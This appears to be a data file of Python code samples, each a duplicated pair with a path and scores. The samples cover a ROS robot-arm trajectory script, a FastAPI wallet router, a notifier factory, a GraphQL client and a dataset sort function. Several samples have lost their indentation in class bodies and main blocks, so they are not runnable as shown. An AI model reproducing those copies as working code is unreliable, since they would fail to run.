        if not exclusive_keywords:  # No filtering requested.
            return list(names)
        banned = exclusive_keywords.replace(' ', '').split(',')
        return [n for n in names
                if not any(b in n for b in banned)]
import rospy
import numpy as np
from std_msgs.msg import Float64
import math
def talker():
    """Publish a scripted joint-angle trajectory for the fuel-tank-lid task.

    Eight position controllers (six arm joints plus two gripper fingers)
    are driven open-loop through a fixed keyframe schedule at 10 Hz.  The
    node exits once the schedule is exhausted or on ROS shutdown.

    Fixes vs. the original if/elif ladder: the two unreachable duplicate
    branches (a second ``i <= 145`` and a second ``i <= 150``) are removed,
    the identical 140/143/145 frames are merged, and the unused ``T``/``n``
    locals are dropped.
    """
    # Publishers in a fixed order matching the angle vectors below:
    # theta1..theta6, grasp_angle1, grasp_angle2.
    topics = [
        '/robot_arm/theta1_controller/command',
        '/robot_arm/theta2_controller/command',
        '/robot_arm/theta3_controller/command',
        '/robot_arm/theta4_controller/command',
        '/robot_arm/theta5_controller/command',
        '/robot_arm/theta6_controller/command',
        '/robot_arm/grasp_angle1_controller/command',
        '/robot_arm/grasp_angle2_controller/command',
    ]
    publishers = [rospy.Publisher(t, Float64, queue_size=10) for t in topics]

    delT = 0.1  # control period in seconds (10 Hz); whole task spans 160 s
    PI = 3.14   # the original script uses 3.14 (not math.pi)

    # Keyframe schedule: (last_step, [theta1..theta6, grasp1, grasp2], message).
    # An entry applies while the step counter i is <= last_step.
    schedule = [
        (50,  [0, PI, 0, PI, 0, 0, 0, 0], None),  # settle in default pose
        (55,  [0, PI - 0.1, 0, PI - 0.1, 0, 0, 0, 0], None),
        (60,  [0, PI - 0.2, 0, PI - 0.2, 0, 0, 0, 0], None),
        (65,  [0, PI - 0.3, 0, PI - 0.3, 0, 0, 0, 0], None),
        (70,  [0, PI - 0.4, 0, PI - 0.5, 0, 0, 0, 0], None),
        (75,  [0, PI - 0.4, 0, PI - 0.7, 0, 0, 0, 0], None),
        (80,  [0, PI - 0.4, 0, PI - 0.9, 0, 0, 0, 0], None),
        (85,  [0.2, PI - 0.4, 0, PI - 1.05, 0, 0, 0, 0], None),
        (90,  [0.27, PI - 0.4, 0, PI - 1.05, 0, 0, 0.2, 0.2], None),  # close gripper
        (120, [0.27, PI - 0.4, 0, PI - 1.05, 0, 0.1, 0.2, 0.2],
         "Unscrewing Fuel Tank Lid"),  # twist wrist while holding the lid
        (122, [0.35, PI - 0.4, 0, PI - 1.05, 0, 0, 0.2, 0.2], None),
        (125, [0.4, PI - 0.4, 0, PI - 1.1, 0, 0, 0.2, 0.2], None),
        (128, [0.5, PI - 0.35, 0, PI - 1.1, 0, 0, 0.2, 0.2], None),
        (130, [0.6, PI - 0.3, 0, PI - 1.2, 0, 0, 0.2, 0.2], None),
        (133, [0.65, PI - 0.25, 0, PI - 1.2, 0, 0, 0.2, 0.2], None),
        (135, [0.7, PI - 0.2, 0, PI - 1.4, 0, 0, 0.2, 0.2], None),
        (138, [0.7, PI - 0.25, 0, PI - 1.2, 0, 0, 0.2, 0.2], None),
        (145, [0.7, PI - 0.2, 0, PI - 1.4, 0, 0, 0, 0], None),  # open gripper
        (150, [0.6, PI - 0.3, 0, PI - 1.2, 0, 0, 0, 0], None),  # retract
        (155, [0.4, PI - 0.4, 0, PI - 1.1, 0, 0, 0, 0], None),
        (158, [0.35, PI - 0.4, 0, PI - 1.1, 0, 0, 0, 0], None),
        (160, [0.27, PI - 0.4, 0, PI - 1.05, 0, 0, 0, 0], None),
    ]

    rospy.init_node('talker', anonymous=True)
    rate = rospy.Rate(1 / delT)  # 10hz
    i = 0
    while not rospy.is_shutdown():
        # Find the first keyframe still covering the current step.
        for last_step, angles, message in schedule:
            if i <= last_step:
                if message:
                    print(message)
                for pub, angle in zip(publishers, angles):
                    pub.publish(angle)
                break
        else:
            break  # schedule exhausted -> task finished
        rate.sleep()
        print("Executing Task")
        i = i + 1
if __name__ == '__main__':
try:
talker()
except rospy.ROSInterruptException:
pass | robot_arm/src/trajectory_publisher.py |
import rospy
import numpy as np
from std_msgs.msg import Float64
import math
def talker():
    """Publish a scripted joint-angle trajectory for the fuel-tank-lid task.

    Eight position controllers (six arm joints plus two gripper fingers)
    are driven open-loop through a fixed keyframe schedule at 10 Hz.  The
    node exits once the schedule is exhausted or on ROS shutdown.

    Fixes vs. the original if/elif ladder: the two unreachable duplicate
    branches (a second ``i <= 145`` and a second ``i <= 150``) are removed,
    the identical 140/143/145 frames are merged, and the unused ``T``/``n``
    locals are dropped.
    """
    # Publishers in a fixed order matching the angle vectors below:
    # theta1..theta6, grasp_angle1, grasp_angle2.
    topics = [
        '/robot_arm/theta1_controller/command',
        '/robot_arm/theta2_controller/command',
        '/robot_arm/theta3_controller/command',
        '/robot_arm/theta4_controller/command',
        '/robot_arm/theta5_controller/command',
        '/robot_arm/theta6_controller/command',
        '/robot_arm/grasp_angle1_controller/command',
        '/robot_arm/grasp_angle2_controller/command',
    ]
    publishers = [rospy.Publisher(t, Float64, queue_size=10) for t in topics]

    delT = 0.1  # control period in seconds (10 Hz); whole task spans 160 s
    PI = 3.14   # the original script uses 3.14 (not math.pi)

    # Keyframe schedule: (last_step, [theta1..theta6, grasp1, grasp2], message).
    # An entry applies while the step counter i is <= last_step.
    schedule = [
        (50,  [0, PI, 0, PI, 0, 0, 0, 0], None),  # settle in default pose
        (55,  [0, PI - 0.1, 0, PI - 0.1, 0, 0, 0, 0], None),
        (60,  [0, PI - 0.2, 0, PI - 0.2, 0, 0, 0, 0], None),
        (65,  [0, PI - 0.3, 0, PI - 0.3, 0, 0, 0, 0], None),
        (70,  [0, PI - 0.4, 0, PI - 0.5, 0, 0, 0, 0], None),
        (75,  [0, PI - 0.4, 0, PI - 0.7, 0, 0, 0, 0], None),
        (80,  [0, PI - 0.4, 0, PI - 0.9, 0, 0, 0, 0], None),
        (85,  [0.2, PI - 0.4, 0, PI - 1.05, 0, 0, 0, 0], None),
        (90,  [0.27, PI - 0.4, 0, PI - 1.05, 0, 0, 0.2, 0.2], None),  # close gripper
        (120, [0.27, PI - 0.4, 0, PI - 1.05, 0, 0.1, 0.2, 0.2],
         "Unscrewing Fuel Tank Lid"),  # twist wrist while holding the lid
        (122, [0.35, PI - 0.4, 0, PI - 1.05, 0, 0, 0.2, 0.2], None),
        (125, [0.4, PI - 0.4, 0, PI - 1.1, 0, 0, 0.2, 0.2], None),
        (128, [0.5, PI - 0.35, 0, PI - 1.1, 0, 0, 0.2, 0.2], None),
        (130, [0.6, PI - 0.3, 0, PI - 1.2, 0, 0, 0.2, 0.2], None),
        (133, [0.65, PI - 0.25, 0, PI - 1.2, 0, 0, 0.2, 0.2], None),
        (135, [0.7, PI - 0.2, 0, PI - 1.4, 0, 0, 0.2, 0.2], None),
        (138, [0.7, PI - 0.25, 0, PI - 1.2, 0, 0, 0.2, 0.2], None),
        (145, [0.7, PI - 0.2, 0, PI - 1.4, 0, 0, 0, 0], None),  # open gripper
        (150, [0.6, PI - 0.3, 0, PI - 1.2, 0, 0, 0, 0], None),  # retract
        (155, [0.4, PI - 0.4, 0, PI - 1.1, 0, 0, 0, 0], None),
        (158, [0.35, PI - 0.4, 0, PI - 1.1, 0, 0, 0, 0], None),
        (160, [0.27, PI - 0.4, 0, PI - 1.05, 0, 0, 0, 0], None),
    ]

    rospy.init_node('talker', anonymous=True)
    rate = rospy.Rate(1 / delT)  # 10hz
    i = 0
    while not rospy.is_shutdown():
        # Find the first keyframe still covering the current step.
        for last_step, angles, message in schedule:
            if i <= last_step:
                if message:
                    print(message)
                for pub, angle in zip(publishers, angles):
                    pub.publish(angle)
                break
        else:
            break  # schedule exhausted -> task finished
        rate.sleep()
        print("Executing Task")
        i = i + 1
if __name__ == '__main__':
try:
talker()
except rospy.ROSInterruptException:
pass | 0.356223 | 0.125708 |
import logging
from typing import List
from aries_cloudcontroller import (
DID,
AcaPyClient,
DIDEndpoint,
DIDEndpointWithType,
)
from fastapi import APIRouter, Depends
from app.dependencies import agent_selector
from app.facades import acapy_wallet
from app.error import CloudApiException
from .models import SetDidEndpointRequest
logger = logging.getLogger(__name__)
router = APIRouter(prefix="/wallet/dids", tags=["wallet"])
@router.post("/", response_model=DID)
async def create_did(
    aries_controller: AcaPyClient = Depends(agent_selector),
):
    """Create a new local DID in the tenant's wallet via the acapy_wallet facade."""
    return await acapy_wallet.create_did(aries_controller)
@router.get("/", response_model=List[DID])
async def list_dids(
    aries_controller: AcaPyClient = Depends(agent_selector),
):
    """
    Retrieve list of DIDs.
    """
    # Normalise a missing/empty result set to an empty list.
    did_result = await aries_controller.wallet.get_dids()
    return did_result.results or []
@router.get("/public", response_model=DID)
async def get_public_did(
    aries_controller: AcaPyClient = Depends(agent_selector),
):
    """
    Fetch the current public DID.

    Raises CloudApiException with status 404 when no public DID is set.
    """
    result = await aries_controller.wallet.get_public_did()
    if not result.result:
        raise CloudApiException("No public did found", 404)
    return result.result
@router.put("/public", response_model=DID)
async def set_public_did(
    did: str,
    aries_controller: AcaPyClient = Depends(agent_selector),
):
    """Set the current public DID (delegates to the acapy_wallet facade)."""
    return await acapy_wallet.set_public_did(aries_controller, did)
@router.patch("/{did}/rotate-keypair", status_code=204)
async def rotate_keypair(
    did: str,
    aries_controller: AcaPyClient = Depends(agent_selector),
):
    """Rotate the keypair of the given DID; responds 204 No Content."""
    await aries_controller.wallet.rotate_keypair(did=did)
@router.get("/{did}/endpoint", response_model=DIDEndpoint)
async def get_did_endpoint(
    did: str,
    aries_controller: AcaPyClient = Depends(agent_selector),
):
    """Get the endpoint registered for the given DID."""
    return await aries_controller.wallet.get_did_endpoint(did=did)
@router.post("/{did}/endpoint", status_code=204)
async def set_did_endpoint(
    did: str,
    body: SetDidEndpointRequest,
    aries_controller: AcaPyClient = Depends(agent_selector),
):
    """Update Endpoint in wallet and on ledger if posted to it.

    Responds 204 No Content; the new endpoint is taken from the request body.
    """
    # "Endpoint" type is for making connections using public indy DIDs
    endpoint_type = "Endpoint"
    await aries_controller.wallet.set_did_endpoint(
        body=DIDEndpointWithType(
            did=did, endpoint=body.endpoint, endpoint_type=endpoint_type
        )
) | app/generic/wallet/wallet.py | import logging
from typing import List
from aries_cloudcontroller import (
DID,
AcaPyClient,
DIDEndpoint,
DIDEndpointWithType,
)
from fastapi import APIRouter, Depends
from app.dependencies import agent_selector
from app.facades import acapy_wallet
from app.error import CloudApiException
from .models import SetDidEndpointRequest
logger = logging.getLogger(__name__)
router = APIRouter(prefix="/wallet/dids", tags=["wallet"])
@router.post("/", response_model=DID)
async def create_did(
    aries_controller: AcaPyClient = Depends(agent_selector),
):
    """Create a new local DID in the tenant's wallet via the acapy_wallet facade."""
    return await acapy_wallet.create_did(aries_controller)
@router.get("/", response_model=List[DID])
async def list_dids(
    aries_controller: AcaPyClient = Depends(agent_selector),
):
    """
    Retrieve list of DIDs.
    """
    # Normalise a missing/empty result set to an empty list.
    did_result = await aries_controller.wallet.get_dids()
    return did_result.results or []
@router.get("/public", response_model=DID)
async def get_public_did(
    aries_controller: AcaPyClient = Depends(agent_selector),
):
    """
    Fetch the current public DID.

    Raises CloudApiException with status 404 when no public DID is set.
    """
    result = await aries_controller.wallet.get_public_did()
    if not result.result:
        raise CloudApiException("No public did found", 404)
    return result.result
@router.put("/public", response_model=DID)
async def set_public_did(
    did: str,
    aries_controller: AcaPyClient = Depends(agent_selector),
):
    """Set the current public DID (delegates to the acapy_wallet facade)."""
    return await acapy_wallet.set_public_did(aries_controller, did)
@router.patch("/{did}/rotate-keypair", status_code=204)
async def rotate_keypair(
    did: str,
    aries_controller: AcaPyClient = Depends(agent_selector),
):
    """Rotate the keypair of the given DID; responds 204 No Content."""
    await aries_controller.wallet.rotate_keypair(did=did)
@router.get("/{did}/endpoint", response_model=DIDEndpoint)
async def get_did_endpoint(
    did: str,
    aries_controller: AcaPyClient = Depends(agent_selector),
):
    """Get the endpoint registered for the given DID."""
    return await aries_controller.wallet.get_did_endpoint(did=did)
@router.post("/{did}/endpoint", status_code=204)
async def set_did_endpoint(
    did: str,
    body: SetDidEndpointRequest,
    aries_controller: AcaPyClient = Depends(agent_selector),
):
    """Update Endpoint in wallet and on ledger if posted to it.

    Responds 204 No Content; the new endpoint is taken from the request body.
    """
    # "Endpoint" type is for making connections using public indy DIDs
    endpoint_type = "Endpoint"
    await aries_controller.wallet.set_did_endpoint(
        body=DIDEndpointWithType(
            did=did, endpoint=body.endpoint, endpoint_type=endpoint_type
        )
) | 0.780077 | 0.164248 |
import os
import logging
import pkgutil
import importlib
logger = logging.getLogger(__name__)
def dummy_notify_factory(notify_func):
    """Wrap a plain notify function in the (conf, value) factory interface.

    The returned factory ignores its configuration arguments and hands
    back *notify_func* unchanged.
    """
    def make_notifier(conf, value):  # conf/value intentionally unused
        return notify_func
    return make_notifier
def load_notifiers():
    """Import every submodule of this package and build a {name: factory}
    registry of notifiers.

    A submodule may provide, in priority order: a ``register(registry)``
    hook, a ``notify_factory`` callable, or a plain ``notify`` function
    (adapted through ``dummy_notify_factory``).  Its registry key is its
    ``NAME`` attribute, falling back to the module's short name.
    """
    path = os.path.dirname(os.path.abspath(__file__))
    # Package prefix for walk_packages, e.g. 'kibitzr.notifier.'
    before, sep, _ = __name__.rpartition('.')
    prefix = before + sep
    registry = {}
    for _, modname, _ in pkgutil.walk_packages([path], prefix):
        submodule = importlib.import_module(modname, __name__)
        if hasattr(submodule, 'register'):
            submodule.register(registry)
        else:
            key = getattr(submodule, 'NAME', modname.split('.')[-1])
            if hasattr(submodule, 'notify_factory'):
                registry[key] = submodule.notify_factory
            elif hasattr(submodule, 'notify'):
                registry[key] = dummy_notify_factory(submodule.notify)
    return registry
class CompositeNotifier(object):
REGISTRY = load_notifiers()
def __init__(self, conf):
    """Build the notifier list from ``conf['notify']``.

    Logs a warning (but still constructs an empty notifier list) when the
    check configuration has no notifications configured.
    """
    self.conf = conf
    notifiers_conf = conf.get('notify', [])
    if not notifiers_conf:
        logger.warning(
            "No notifications configured for %r",
            conf['name'],
        )
    self.notifiers = []
    for notifier_conf in notifiers_conf:
        self.add_notifier(notifier_conf)
def add_notifier(self, notifier_conf):
    """Instantiate one notifier from a config entry and append it.

    The entry is either a one-item mapping ``{name: value}`` or a plain
    name with no settings.  Unknown notifier names are logged and skipped.
    """
    try:
        name, value = next(iter(notifier_conf.items()))
    except AttributeError:
        # Plain (non-mapping) entry: just a notifier name, no settings.
        name, value = notifier_conf, None
    try:
        notify_factory = self.REGISTRY[name]
    except KeyError:
        logger.error("Unknown notifier %r", name)
    else:
        self.notifiers.append(
            notify_factory(conf=self.conf, value=value)
        )
def notify(self, report):
    """Send *report* through every configured notifier.

    A falsy report is skipped.  A failure in one notifier is logged and
    does not prevent the remaining notifiers from running.
    """
    if report:
        logger.debug('Sending report: %r', report)
        for notifier in self.notifiers:
            try:
                notifier(report=report)
            # Was a bare ``except:``, which also swallowed SystemExit and
            # KeyboardInterrupt; catch Exception so those still propagate.
            except Exception:
                logger.exception(
                    "Exception occurred during sending notification"
                )
    else:
        logger.debug('Report is empty, skipping notification')
__call__ = notify | kibitzr/notifier/factory.py | import os
import logging
import pkgutil
import importlib
logger = logging.getLogger(__name__)
def dummy_notify_factory(notify_func):
    """Wrap a plain notify function in the (conf, value) factory interface.

    The returned factory ignores its configuration arguments and hands
    back *notify_func* unchanged.
    """
    def make_notifier(conf, value):  # conf/value intentionally unused
        return notify_func
    return make_notifier
def load_notifiers():
    """Import every submodule of this package and build a {name: factory}
    registry of notifiers.

    A submodule may provide, in priority order: a ``register(registry)``
    hook, a ``notify_factory`` callable, or a plain ``notify`` function
    (adapted through ``dummy_notify_factory``).  Its registry key is its
    ``NAME`` attribute, falling back to the module's short name.
    """
    path = os.path.dirname(os.path.abspath(__file__))
    # Package prefix for walk_packages, e.g. 'kibitzr.notifier.'
    before, sep, _ = __name__.rpartition('.')
    prefix = before + sep
    registry = {}
    for _, modname, _ in pkgutil.walk_packages([path], prefix):
        submodule = importlib.import_module(modname, __name__)
        if hasattr(submodule, 'register'):
            submodule.register(registry)
        else:
            key = getattr(submodule, 'NAME', modname.split('.')[-1])
            if hasattr(submodule, 'notify_factory'):
                registry[key] = submodule.notify_factory
            elif hasattr(submodule, 'notify'):
                registry[key] = dummy_notify_factory(submodule.notify)
    return registry
class CompositeNotifier(object):
REGISTRY = load_notifiers()
def __init__(self, conf):
    """Build the notifier list from ``conf['notify']``.

    Logs a warning (but still constructs an empty notifier list) when the
    check configuration has no notifications configured.
    """
    self.conf = conf
    notifiers_conf = conf.get('notify', [])
    if not notifiers_conf:
        logger.warning(
            "No notifications configured for %r",
            conf['name'],
        )
    self.notifiers = []
    for notifier_conf in notifiers_conf:
        self.add_notifier(notifier_conf)
def add_notifier(self, notifier_conf):
    """Instantiate one notifier from a config entry and append it.

    The entry is either a one-item mapping ``{name: value}`` or a plain
    name with no settings.  Unknown notifier names are logged and skipped.
    """
    try:
        name, value = next(iter(notifier_conf.items()))
    except AttributeError:
        # Plain (non-mapping) entry: just a notifier name, no settings.
        name, value = notifier_conf, None
    try:
        notify_factory = self.REGISTRY[name]
    except KeyError:
        logger.error("Unknown notifier %r", name)
    else:
        self.notifiers.append(
            notify_factory(conf=self.conf, value=value)
        )
def notify(self, report):
    """Send *report* through every configured notifier.

    A falsy report is skipped.  A failure in one notifier is logged and
    does not prevent the remaining notifiers from running.
    """
    if report:
        logger.debug('Sending report: %r', report)
        for notifier in self.notifiers:
            try:
                notifier(report=report)
            # Was a bare ``except:``, which also swallowed SystemExit and
            # KeyboardInterrupt; catch Exception so those still propagate.
            except Exception:
                logger.exception(
                    "Exception occurred during sending notification"
                )
    else:
        logger.debug('Report is empty, skipping notification')
__call__ = notify | 0.259356 | 0.052814 |
from gql import gql, Client
from gql.transport.requests import RequestsHTTPTransport
from flatdict import FlatDict
import pandas as pd
# flatten array of nested dicts to array of single level dictionary
def flatten(data, delimiter=':'):
    """Flatten an iterable of nested dicts into a DataFrame.

    Nested keys are joined with *delimiter*; columns containing only
    empty values are dropped.
    """
    flat_rows = [FlatDict(row, delimiter=delimiter) for row in data]
    return pd.DataFrame(flat_rows).dropna(axis=1, how='all')
# unwrap nested arrays in an array of dicts to a single array of dicts
# this replicates the contents of the parent dict to all nested instances
# eg. [{'a': 'x', 'b':[1, 2]}] -> [{'a': 'x', 'b':1}, [{'a': 'x', 'b':2}]
def repl(data, ref):
    """Explode the list stored under *ref* in each dict.

    The remaining keys of each dict are replicated for every element of
    its *ref* list, e.g.
    [{'a': 'x', 'b': [1, 2]}] -> [{'a': 'x', 'b': 1}, {'a': 'x', 'b': 2}]
    """
    exploded = []
    for row in data:
        for item in row[ref]:
            exploded.append({**row, ref: item})
    return exploded
# create a client
class Data:
_authenticated = False
def __init__(self, url, token=None):
    """Create a GraphQL client for *url*.

    token: optional session id; when given it is sent as the
    KIWI_PHPSESSID cookie and the source is marked authenticated.
    """
    cookies = {}
    if token:
        cookies['KIWI_PHPSESSID'] = token
        self._authenticated = True
    transport = RequestsHTTPTransport(url, cookies=cookies)
    self.client = Client(
        transport=transport,
        fetch_schema_from_transport=True,
    )
@property
def authenticated(self):
    """Whether a session token was supplied at construction time."""
    return self._authenticated
@property
def admin(self):
    """True if the authenticated user is an admin; False when the
    source is unauthenticated."""
    if not self._authenticated:
        return False
    query = gql('''
    {
        user {
            isAdmin
        }
    }
    ''')
    result = self.client.execute(query)
    return result['user']['isAdmin']
def activities(self):
    """Return current activities (name, description, author name,
    location address) as a flattened DataFrame."""
    query = gql('''
    {
        current {
            name
            description
            author {
                name
            }
            location {
                address
            }
        }
    }
    ''')
    result = self.client.execute(query)
    return flatten(result['current'])
def registrations(self):
    """Return non-deleted registrations per current activity as a
    DataFrame with columns ['name', 'registrations:created']."""
    query = gql('''
    {
        current {
            name
            registrations {
                created
                deleted
            }
        }
    }
    ''')
    result = self.client.execute(query)
    # One row per registration; keep only rows whose 'deleted' is null.
    registrations = flatten(repl(result['current'], 'registrations'))
    return registrations.loc[registrations["registrations:deleted"].isnull(), ['name', 'registrations:created']]
def user_relations(self):
    """Return the current user's group relations as a flattened DataFrame."""
    query = gql('''
    {
        user {
            relations {
                group {
                    name
                }
            }
        }
    }
    ''')
    result = self.client.execute(query)
    return flatten(result['user']['relations'])
def user_registrations(self):
    """Return the current user's registrations (activity name/start and
    option price) as a flattened DataFrame."""
    query = gql('''
    {
        user {
            registrations {
                activity {
                    name
                    start
                }
                option {
                    price
                }
            }
        }
    }
    ''')
    result = self.client.execute(query)
    return flatten(result['user']['registrations'])
def groups(self):
    """Return all groups as a flattened DataFrame.

    Raises:
        Exception: when the source is unauthenticated.
    """
    if not self._authenticated:
        raise Exception("Source unauthenticated")
    query = gql('''
    {
        groups {
            name
        }
    }
    ''')
    result = self.client.execute(query)
return flatten(result['groups']) | src/data.py | from gql import gql, Client
from gql.transport.requests import RequestsHTTPTransport
from flatdict import FlatDict
import pandas as pd
# flatten array of nested dicts to array of single level dictionary
def flatten(data, delimiter=':'):
    """Flatten an iterable of nested dicts into a DataFrame.

    Nested keys are joined with *delimiter*; columns containing only
    empty values are dropped.
    """
    flat_rows = [FlatDict(row, delimiter=delimiter) for row in data]
    return pd.DataFrame(flat_rows).dropna(axis=1, how='all')
# unwrap nested arrays in an array of dicts to a single array of dicts
# this replicates the contents of the parent dict to all nested instances
# eg. [{'a': 'x', 'b':[1, 2]}] -> [{'a': 'x', 'b':1}, [{'a': 'x', 'b':2}]
def repl(data, ref):
    """Explode the list stored under *ref* in each dict.

    The remaining keys of each dict are replicated for every element of
    its *ref* list, e.g.
    [{'a': 'x', 'b': [1, 2]}] -> [{'a': 'x', 'b': 1}, {'a': 'x', 'b': 2}]
    """
    exploded = []
    for row in data:
        for item in row[ref]:
            exploded.append({**row, ref: item})
    return exploded
# create a client
class Data:
_authenticated = False
def __init__(self, url, token=None):
    """Create a GraphQL client for *url*.

    token: optional session id; when given it is sent as the
    KIWI_PHPSESSID cookie and the source is marked authenticated.
    """
    cookies = {}
    if token:
        cookies['KIWI_PHPSESSID'] = token
        self._authenticated = True
    transport = RequestsHTTPTransport(url, cookies=cookies)
    self.client = Client(
        transport=transport,
        fetch_schema_from_transport=True,
    )
@property
def authenticated(self):
    """Whether a session token was supplied at construction time."""
    return self._authenticated
@property
def admin(self):
    """True if the authenticated user is an admin; False when the
    source is unauthenticated."""
    if not self._authenticated:
        return False
    query = gql('''
    {
        user {
            isAdmin
        }
    }
    ''')
    result = self.client.execute(query)
    return result['user']['isAdmin']
def activities(self):
    """Return current activities (name, description, author name,
    location address) as a flattened DataFrame."""
    query = gql('''
    {
        current {
            name
            description
            author {
                name
            }
            location {
                address
            }
        }
    }
    ''')
    result = self.client.execute(query)
    return flatten(result['current'])
def registrations(self):
    """Return non-deleted registrations per current activity as a
    DataFrame with columns ['name', 'registrations:created']."""
    query = gql('''
    {
        current {
            name
            registrations {
                created
                deleted
            }
        }
    }
    ''')
    result = self.client.execute(query)
    # One row per registration; keep only rows whose 'deleted' is null.
    registrations = flatten(repl(result['current'], 'registrations'))
    return registrations.loc[registrations["registrations:deleted"].isnull(), ['name', 'registrations:created']]
def user_relations(self):
    """Return the current user's group relations as a flattened DataFrame."""
    query = gql('''
    {
        user {
            relations {
                group {
                    name
                }
            }
        }
    }
    ''')
    result = self.client.execute(query)
    return flatten(result['user']['relations'])
def user_registrations(self):
    """Return the current user's registrations (activity name/start and
    option price) as a flattened DataFrame."""
    query = gql('''
    {
        user {
            registrations {
                activity {
                    name
                    start
                }
                option {
                    price
                }
            }
        }
    }
    ''')
    result = self.client.execute(query)
    return flatten(result['user']['registrations'])
def groups(self):
    """Return all groups as a flattened DataFrame.

    Raises:
        Exception: when the source is unauthenticated.
    """
    if not self._authenticated:
        raise Exception("Source unauthenticated")
    query = gql('''
    {
        groups {
            name
        }
    }
    ''')
    result = self.client.execute(query)
return flatten(result['groups']) | 0.727589 | 0.363619 |
from typing import List
from r2c_isg.structures import Dataset
def sort(ds: Dataset, params: List[str]) -> None:
    """Sorts the projects/versions based on the given parameters.

    Args:
        ds: dataset whose ``projects`` list (and each project's
            ``versions`` list) is sorted in place.
        params: sort keys, optionally preceded by 'asc'/'desc' order
            tokens; an order token applies to the keys that follow it.
    """
    # useful url: https://realpython.com/python-sort/
    # organize the params list--sort by last param first
    # default sort order is ascending
    if params[0] not in ['asc', 'desc']:
        params.insert(0, 'asc')
    # reverse the list
    params = params[::-1]
    # re-insert the sort orders before their associated sort keys
    insert_at = 0
    for i in range(len(params)):
        if params[i] in ['asc', 'desc']:
            param = params.pop(i)
            params.insert(insert_at, param)
            insert_at = i + 1
    # sort the dataset
    # (initial value is irrelevant: after normalization above, the first
    # element is always an 'asc'/'desc' token, which resets it)
    reverse = True
    for param in params:
        if param in ['asc', 'desc']:
            # set the sort order
            reverse = (param == 'desc')
        else:
            # sort on this parameter
            # Note: Parameter strings can follow these formats:
            #     'attr'         sort on project attribute
            #     'uuids.key'    sort on project uuid
            #     'meta.key'     sort on project meta
            #     'v.attr'       sort on version attribute
            #     'v.uuids.key'  sort on version uuid
            #     'v.meta.key'   sort on version meta
            p_list = param.split('.')
            # determine if we're sorting on project or version
            on_project = True
            if p_list[0] == 'v':
                on_project = False
                p_list.pop(0)
            # build a sort function
            attr = p_list[0]
            if attr == 'uuids':
                # sort on a uuid value
                # NOTE: 'key' is captured by late binding; it is assigned
                # just below, before the sort executes this closure.
                def sort_uuid(o: object):
                    if not key in o.uuids_:
                        raise Exception('Nonexistent sort key.')
                    return o.uuids_[key]()
                key = p_list[1]
                sort_func = lambda o: sort_uuid(o)
            elif attr == 'meta':
                # sort on a meta value (same late-binding pattern as above)
                def sort_meta(o: object):
                    if not key in o.meta_:
                        raise Exception('Nonexistent sort key.')
                    return o.meta_[key]()
                key = p_list[1]
                sort_func = lambda o: sort_meta(o)
            else:
                # sort on a regular attribute
                def sort_attr(o: object):
                    # warn only once per sort key; the flag lives on the
                    # 'sort' function object itself
                    if not hasattr(o, attr) and not sort.keyerr_warning:
                        print(" Warning: Sort key '%s' was not "
                              'found in all projects/versions; assuming '
                              "'' for those items." % attr)
                        sort.keyerr_warning = True
                    # get & clean up the attribute
                    val = getattr(o, attr, '')
                    if isinstance(val, str):
                        val = val.lower()
                    return val
                sort.keyerr_warning = False
                sort_func = lambda o: sort_attr(o)
            # perform the sort
            if on_project:
                # sort on project
                ds.projects.sort(key=sort_func, reverse=reverse)
            else:
                # sort on version
                for project in ds.projects:
                    project.versions.sort(key=sort_func, reverse=reverse)
    total_versions = sum([len(p.versions) for p in ds.projects])
    print(' Sorted {:,} projects and {:,} versions by {}.'
.format(len(ds.projects), total_versions, str(params))) | r2c_isg/functions/sort.py | from typing import List
from r2c_isg.structures import Dataset
def sort(ds: Dataset, params: List[str]) -> None:
    """Sorts the projects/versions based on the given parameters.

    Args:
        ds: dataset whose ``projects`` list (and each project's
            ``versions`` list) is sorted in place.
        params: sort keys, optionally preceded by 'asc'/'desc' order
            tokens; an order token applies to the keys that follow it.
    """
    # useful url: https://realpython.com/python-sort/
    # organize the params list--sort by last param first
    # default sort order is ascending
    if params[0] not in ['asc', 'desc']:
        params.insert(0, 'asc')
    # reverse the list
    params = params[::-1]
    # re-insert the sort orders before their associated sort keys
    insert_at = 0
    for i in range(len(params)):
        if params[i] in ['asc', 'desc']:
            param = params.pop(i)
            params.insert(insert_at, param)
            insert_at = i + 1
    # sort the dataset
    # (initial value is irrelevant: after normalization above, the first
    # element is always an 'asc'/'desc' token, which resets it)
    reverse = True
    for param in params:
        if param in ['asc', 'desc']:
            # set the sort order
            reverse = (param == 'desc')
        else:
            # sort on this parameter
            # Note: Parameter strings can follow these formats:
            #     'attr'         sort on project attribute
            #     'uuids.key'    sort on project uuid
            #     'meta.key'     sort on project meta
            #     'v.attr'       sort on version attribute
            #     'v.uuids.key'  sort on version uuid
            #     'v.meta.key'   sort on version meta
            p_list = param.split('.')
            # determine if we're sorting on project or version
            on_project = True
            if p_list[0] == 'v':
                on_project = False
                p_list.pop(0)
            # build a sort function
            attr = p_list[0]
            if attr == 'uuids':
                # sort on a uuid value
                # NOTE: 'key' is captured by late binding; it is assigned
                # just below, before the sort executes this closure.
                def sort_uuid(o: object):
                    if not key in o.uuids_:
                        raise Exception('Nonexistent sort key.')
                    return o.uuids_[key]()
                key = p_list[1]
                sort_func = lambda o: sort_uuid(o)
            elif attr == 'meta':
                # sort on a meta value (same late-binding pattern as above)
                def sort_meta(o: object):
                    if not key in o.meta_:
                        raise Exception('Nonexistent sort key.')
                    return o.meta_[key]()
                key = p_list[1]
                sort_func = lambda o: sort_meta(o)
            else:
                # sort on a regular attribute
                def sort_attr(o: object):
                    # warn only once per sort key; the flag lives on the
                    # 'sort' function object itself
                    if not hasattr(o, attr) and not sort.keyerr_warning:
                        print(" Warning: Sort key '%s' was not "
                              'found in all projects/versions; assuming '
                              "'' for those items." % attr)
                        sort.keyerr_warning = True
                    # get & clean up the attribute
                    val = getattr(o, attr, '')
                    if isinstance(val, str):
                        val = val.lower()
                    return val
                sort.keyerr_warning = False
                sort_func = lambda o: sort_attr(o)
            # perform the sort
            if on_project:
                # sort on project
                ds.projects.sort(key=sort_func, reverse=reverse)
            else:
                # sort on version
                for project in ds.projects:
                    project.versions.sort(key=sort_func, reverse=reverse)
    total_versions = sum([len(p.versions) for p in ds.projects])
    print(' Sorted {:,} projects and {:,} versions by {}.'
.format(len(ds.projects), total_versions, str(params))) | 0.864625 | 0.354545 |
import numpy as np
from perspective.table import Table
from random import random, randint, choice
from faker import Faker
import pandas as pd
fake = Faker()
def superstore(count=10):
data = []
for id in range(count):
dat = {}
dat['Row ID'] = id
dat['Order ID'] = fake.ein()
dat['Order Date'] = fake.date_this_year()
